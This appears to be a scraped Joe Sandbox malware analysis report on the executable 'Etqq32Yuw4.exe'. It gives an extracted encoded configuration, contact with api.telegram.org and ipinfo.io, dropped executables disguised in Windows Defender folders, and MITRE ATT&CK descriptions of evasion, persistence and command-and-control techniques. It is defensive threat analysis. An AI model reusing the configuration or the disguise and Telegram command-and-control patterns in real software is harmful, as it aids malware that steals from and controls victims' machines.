Source: 00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","fontdrvhost","0","NEWORK PC","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Etqq32Yuw4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Defender\en-GB\a4a755f39d8609

C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe

C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe:Zone.Identifier

C:\Program Files\Uninstall Information\a4a755f39d8609

C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe

C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe:Zone.Identifier

C:\Program Files\Windows Defender\Platform\a4a755f39d8609

C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe

C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Etqq32Yuw4.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gmRWetzDcocJEC.exe.log

C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat

C:\Users\user\AppData\Local\Temp\qrXWXdvzxq

Windows Analysis Report
Etqq32Yuw4.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre